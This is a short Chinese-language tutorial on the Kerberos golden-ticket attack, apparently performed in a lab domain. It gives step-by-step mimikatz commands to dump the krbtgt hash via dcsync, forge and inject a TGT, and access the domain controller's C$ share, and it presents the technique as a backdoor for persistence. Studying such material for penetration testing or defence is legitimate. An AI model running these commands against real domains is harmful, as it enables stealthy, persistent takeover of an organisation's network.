1 是什么
使用krbtgt用户hash生成的票据被称为黄金票据,伪造TGT,票据传递,不需要管理员权限就可以传递,mimikatz和kekeo传递
使用mimikatz把内存中的票据导出
2 怎么做
-
黄金票据
其实更像是一种留后门的方式,域控权限的维持,最重要的是获取到Krbtgt用户的hash,从域用户到域控 -
实现条件
域名、域账户、域sid、krbtgt哈希(ntlm、aes) -
攻击方式
既可以使用ntlm,也可使用aes256
有两种,直接在mimitatz生成使用,生成在同级目录下导入票据
3 具体怎么做
(1)信息收集
不过mimitatz报毒了,这个工具在实际情况下肯定不太好使
1 信息收集,把mimikatz上传到域成员机器(win7)
systeminfo #域名
whoami /all #域账户、域sid
privilege::debug #提权
lsadump::dcsync /domain:god.org /user:krbtgt
- 域名: god.org
- 域账户:administrator
- 域sid:S-1-5-21-2952760202-1353902439-2381784089-500
- krbtgt Hash NTLM:58e91a5ac358d86513ab224312314061
(2)伪造黄金票据
- 制作票据
kerberos::purge #清空票据
kerberos::list #列出票据
kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089-500 /krbtgt:58e91a5ac358d86513ab224312314061
- 导入票据
kerberos::ptt ticket.kirbi
kerberos::list
(3)查看域控根目录
dir \192.168.52.138\c$
4 甜点
- 生成的黄金票据
- klist也可以查看票据(命令行直接执行)
参考链接
- https://blog.csdn.net/shuteer_xu/article/details/107031951
- https://blog.csdn.net/zzgslh/article/details/106896431
- https://blog.csdn.net/weixin_30791095/article/details/98036509
- https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210531